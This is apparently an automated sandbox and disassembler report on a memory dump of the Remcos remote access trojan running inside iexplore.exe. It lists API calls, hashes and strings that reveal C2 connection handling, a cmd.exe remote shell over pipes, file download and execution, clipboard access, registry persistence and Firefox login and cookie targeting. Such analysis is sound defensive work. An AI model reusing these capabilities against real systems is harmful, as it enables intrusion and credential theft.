              • Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 448 414f2a-414f72 call 4020df call 41b8b3 call 4020df call 401e65 call 401fab call 43baac 461 414f81-414fcd call 402093 call 401e65 call 4020f6 call 41be1b call 40489e call 401e65 call 40b9bd 448->461 462 414f74-414f7b Sleep 448->462 477 415041-4150dc call 402093 call 401e65 call 4020f6 call 41be1b call 401e65 * 2 call 406c1e call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 461->477 478 414fcf-41503e call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 461->478 462->461 531 4150ec-4150f3 477->531 532 4150de-4150ea 477->532 478->477 533 4150f8-41518a call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b4ef call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414ee9 531->533 532->533 560 4151d5-4151e3 call 40482d 533->560 561 41518c-4151d0 WSAGetLastError call 41cae1 call 4052fd call 402093 call 41b4ef call 401fd8 533->561 566 415210-415216 call 404f51 560->566 567 4151e5-41520b call 402093 * 2 call 41b4ef 560->567 582 415aa3-415ab5 call 404e26 call 4021fa 561->582 572 41521b-415225 call 4048c8 566->572 567->582 572->582 583 41522b-41537e call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b4ef call 401fd8 * 4 call 41b7e0 call 4145bd call 40905c call 441e81 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 4136f8 572->583 597 415ab7-415ad7 call 401e65 call 401fab call 43baac Sleep 582->597 598 415add-415ae5 call 401e8d 582->598 648 415380-41538d call 405aa6 583->648 649 415392-4153b9 call 401fab call 4135a6 583->649 597->598 598->477 648->649 655 4153c0-415a16 call 40417e call 40dd89 call 41bc42 call 41bd1e call 41bb8e call 401e65 GetTickCount call 41bb8e call 41bae6 call 41bb8e * 2 call 41ba96 call 41bd1e * 5 call 40f8d1 call 41bd1e call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 call 404aa1 call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 649->655 656 4153bb-4153bd 649->656 902 415a18-415a1f 655->902 903 415a2a-415a31 655->903 656->655 902->903 904 415a21-415a23 902->904 905 415a33-415a38 call 40b051 903->905 906 415a3d-415a6f call 405a6b call 402093 * 2 call 41b4ef 903->906 904->903 905->906 917 415a71-415a7d CreateThread 906->917 918 415a83-415a9e call 401fd8 * 2 call 401f09 906->918 917->918 918->582
              APIs
              • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414F7B
              • WSAGetLastError.WS2_32(00000000,00000001), ref: 0041518C
              • Sleep.KERNELBASE(00000000,00000002), ref: 00415AD7
                • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Sleep$ErrorLastLocalTime
              • String ID: | $%I64u$5.0.0 Pro$8SG$C:\Program Files (x86)\Internet Explorer\iexplore.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$PSG$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
              • API String ID: 524882891-3088903445
              • Opcode ID: 1719cee4c1b2f3c2eb356ae7cbe2d761748de9ba2a2926d6ff10c6b7dc8c799a
              • Instruction ID: 324fc11d7bea0fba9c16e2c7d7b547a311b01f704130931fc4cc70caa797af2d
              • Opcode Fuzzy Hash: 1719cee4c1b2f3c2eb356ae7cbe2d761748de9ba2a2926d6ff10c6b7dc8c799a
              • Instruction Fuzzy Hash: 22526B31A001155ACB18F732DD96AFE73769F90344F6041BFE40A761E2EF781E858A5D

              Control-flow Graph

              APIs
              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
              • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
              • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
              • closesocket.WS2_32(000000FF), ref: 00404E5A
              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
              • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBF
              • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EC4
              • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
              • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED6
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: CloseEvent$ObjectSingleWait$ChangeFindHandleNotification$closesocket
              • String ID:
              • API String ID: 4074944092-0
              • Opcode ID: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
              • Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
              • Opcode Fuzzy Hash: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
              • Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58

              Control-flow Graph

              APIs
              • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040DB9A
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: LongNamePath
              • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
              • API String ID: 82841172-425784914
              • Opcode ID: da5f0060826a558894883e6bfc0be8872fb7d3565c3035b4badf37544c73e64a
              • Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
              • Opcode Fuzzy Hash: da5f0060826a558894883e6bfc0be8872fb7d3565c3035b4badf37544c73e64a
              • Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1088 41376f-413786 RegCreateKeyA 1089 413788-4137bd call 40247c call 401fab RegSetValueExA RegCloseKey 1088->1089 1090 4137bf 1088->1090 1092 4137c1-4137cf call 401fd8 1089->1092 1090->1092
              APIs
              • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
              • RegSetValueExA.KERNELBASE(?,004674B8,00000000,?,00000000,00000000,004752F0,?,?,0040F853,004674B8,5.0.0 Pro), ref: 004137A6
              • RegCloseKey.ADVAPI32(?,?,?,0040F853,004674B8,5.0.0 Pro), ref: 004137B1
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: CloseCreateValue
              • String ID: pth_unenc
              • API String ID: 1818849710-4028850238
              • Opcode ID: 4f15aeb283403f146db3f09acdab1127f952c22a8adcae04a958ae624d8eac3f
              • Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
              • Opcode Fuzzy Hash: 4f15aeb283403f146db3f09acdab1127f952c22a8adcae04a958ae624d8eac3f
              • Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1098 40d069-40d095 call 401fab CreateMutexA GetLastError
              APIs
              • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
              • GetLastError.KERNEL32 ref: 0040D083
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: CreateErrorLastMutex
              • String ID: SG
              • API String ID: 1925916568-3189917014
              • Opcode ID: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
              • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
              • Opcode Fuzzy Hash: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
              • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1101 413877-41388d RegCreateKeyA 1102 4138b9 1101->1102 1103 41388f-4138b7 RegSetValueExA RegCloseKey 1101->1103 1104 4138bb-4138be 1102->1104 1103->1104
              APIs
              • RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
              • RegSetValueExA.KERNELBASE(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
              • RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: CloseCreateValue
              • String ID:
              • API String ID: 1818849710-0
              • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
              • Instruction ID: 04a42b38e2882b978ed87177a7d0f50f8458418d63be9de7f69fe35b215911ab
              • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
              • Instruction Fuzzy Hash: 16E06572500318FBEF115F90DC05FEA7B6CDF04B52F1045A5BF09A6191D3358E549798

              Control-flow Graph

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: _wcslen
              • String ID: pQG
              • API String ID: 176396367-3769108836
              • Opcode ID: 1f3b91536cece4da7108cf24afec647958326f81796985407c04b0a2ae37731c
              • Instruction ID: e6961f6084f98a1e57a9a6385a58e5d20214d93246a99e64d0d6a4ea431d93e1
              • Opcode Fuzzy Hash: 1f3b91536cece4da7108cf24afec647958326f81796985407c04b0a2ae37731c
              • Instruction Fuzzy Hash: 8111C3319002059BCB15EF65E8529EF7BB5EF54318B10013FF406A62E2EFB8AD05CB98

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1140 40482d-404837 1141 404846-40485e socket 1140->1141 1142 404839-404840 call 40489e 1140->1142 1143 404860-40489d CreateEventW 1141->1143 1144 404842-404845 1141->1144 1142->1141 1142->1144
              APIs
              • socket.WS2_32(?,00000001,00000006), ref: 00404852
              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: CreateEventStartupsocket
              • String ID:
              • API String ID: 1953588214-0
              • Opcode ID: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
              • Instruction ID: 7af5cc85a36d800a693892934b5c0b91abe86707509305098cc6d5fca1b6a633
              • Opcode Fuzzy Hash: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
              • Instruction Fuzzy Hash: 6E0171B1408B809ED7359F38A8456977FE0AB55304F048D6EF1DA97B91D3B5A881CB18

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1147 414ee9-414ef6 1148 414f02-414f1a getaddrinfo WSASetLastError 1147->1148 1149 414ef8-414efd call 414d86 1147->1149 1149->1148
              APIs
              • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,004750E4,00000000,00415188,00000000,00000001), ref: 00414F0B
              • WSASetLastError.WS2_32(00000000), ref: 00414F10
                • Part of subcall function 00414D86: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E17
                • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E76
                • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
              • String ID:
              • API String ID: 1170566393-0
              • Opcode ID: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
              • Instruction ID: cadd3d9b0d0923a9352550a0b766658ea18523973fceddbfefdc7c35282954d4
              • Opcode Fuzzy Hash: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
              • Instruction Fuzzy Hash: 9ED017322015316BD320A769AC01AFBAA9EDBD7771B16003BFA08D3210D6949C8282E8
              APIs
              • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Startup
              • String ID:
              • API String ID: 724789610-0
              • Opcode ID: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
              • Instruction ID: a24ce82555f98f109a53945ea9c337c8597cdca763f75144b39f195b4e3f482d
              • Opcode Fuzzy Hash: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
              • Instruction Fuzzy Hash: 0DD0C9325586088AE620AAB4AD0B8A4775C8312615F0007AA6CA5835D2E6446A19C2AA
              APIs
              • SetEvent.KERNEL32(?,?), ref: 00407CB9
              • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
              • DeleteFileW.KERNEL32(00000000), ref: 00407DA9
                • Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                • Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                • Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
              • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00408278
              • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
              • DeleteFileA.KERNEL32(?), ref: 00408652
                • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
                • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
              • Sleep.KERNEL32(000007D0), ref: 004086F8
              • StrToIntA.SHLWAPI(00000000,00000000), ref: 0040873A
                • Part of subcall function 0041C9E2: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
              • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
              • API String ID: 1067849700-181434739
              • Opcode ID: f5be062bc6f6ca18a4518a8c9277404c2c18d002b026817d4d5d71d644ac7eeb
              • Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
              • Opcode Fuzzy Hash: f5be062bc6f6ca18a4518a8c9277404c2c18d002b026817d4d5d71d644ac7eeb
              • Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B
              APIs
              • __Init_thread_footer.LIBCMT ref: 004056E6
                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
              • __Init_thread_footer.LIBCMT ref: 00405723
              • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
              • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
              • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
              • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
              • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
              • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660C0,00000062,004660A4), ref: 004059E4
              • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
              • TerminateProcess.KERNEL32(00000000), ref: 00405A17
              • CloseHandle.KERNEL32 ref: 00405A23
              • CloseHandle.KERNEL32 ref: 00405A2B
              • CloseHandle.KERNEL32 ref: 00405A3D
              • CloseHandle.KERNEL32 ref: 00405A45
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
              • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
              • API String ID: 2994406822-18413064
              • Opcode ID: 0003b016e61a0301a3934eed36c3c71fcbbc8a02a2502bcd5a2dc79125391ef8
              • Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
              • Opcode Fuzzy Hash: 0003b016e61a0301a3934eed36c3c71fcbbc8a02a2502bcd5a2dc79125391ef8
              • Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
              APIs
              • GetCurrentProcessId.KERNEL32 ref: 00412106
                • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                • Part of subcall function 00413877: RegSetValueExA.KERNELBASE(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
              • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412146
              • CloseHandle.KERNEL32(00000000), ref: 00412155
              • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
              • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
              • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
              • API String ID: 3018269243-13974260
              • Opcode ID: b97d0f2ab225ceb6ffbbf800b52b5447991706e3fb286f6df761fbc963dc5d18
              • Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
              • Opcode Fuzzy Hash: b97d0f2ab225ceb6ffbbf800b52b5447991706e3fb286f6df761fbc963dc5d18
              • Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E
              APIs
              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
              • FindClose.KERNEL32(00000000), ref: 0040BBC9
              • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
              • FindClose.KERNEL32(00000000), ref: 0040BD12
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Find$CloseFile$FirstNext
              • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
              • API String ID: 1164774033-3681987949
              • Opcode ID: a7abc2cbee64d590697779d9a46801e96057498aa45ff5fe343c94ad28998e44
              • Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
              • Opcode Fuzzy Hash: a7abc2cbee64d590697779d9a46801e96057498aa45ff5fe343c94ad28998e44
              • Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89
              APIs
              • OpenClipboard.USER32 ref: 004168C2
              • EmptyClipboard.USER32 ref: 004168D0
              • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
              • GlobalLock.KERNEL32(00000000), ref: 004168F9
              • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
              • SetClipboardData.USER32(0000000D,00000000), ref: 00416938
              • CloseClipboard.USER32 ref: 00416955
              • OpenClipboard.USER32 ref: 0041695C
              • GetClipboardData.USER32(0000000D), ref: 0041696C
              • GlobalLock.KERNEL32(00000000), ref: 00416975
              • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
              • CloseClipboard.USER32 ref: 00416984
                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
              • String ID: !D@
              • API String ID: 3520204547-604454484
              • Opcode ID: fe582c62d716831c7a5d686468f8ff4fa392a0f30dc1f81f04eaead869cdf2c1
              • Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
              • Opcode Fuzzy Hash: fe582c62d716831c7a5d686468f8ff4fa392a0f30dc1f81f04eaead869cdf2c1
              • Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A
              APIs
              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
              • FindClose.KERNEL32(00000000), ref: 0040BDC9
              • FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
              • FindClose.KERNEL32(00000000), ref: 0040BEAF
              • FindClose.KERNEL32(00000000), ref: 0040BED0
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Find$Close$File$FirstNext
              • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
              • API String ID: 3527384056-432212279
              • Opcode ID: 48f1059577fb6fb3e12f81dcccae54fa1aae2825fed048d23a83c2489a6cdfe4
              • Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
              • Opcode Fuzzy Hash: 48f1059577fb6fb3e12f81dcccae54fa1aae2825fed048d23a83c2489a6cdfe4
              • Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E
              APIs
              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
              • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F563
                • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
              • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F66E
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
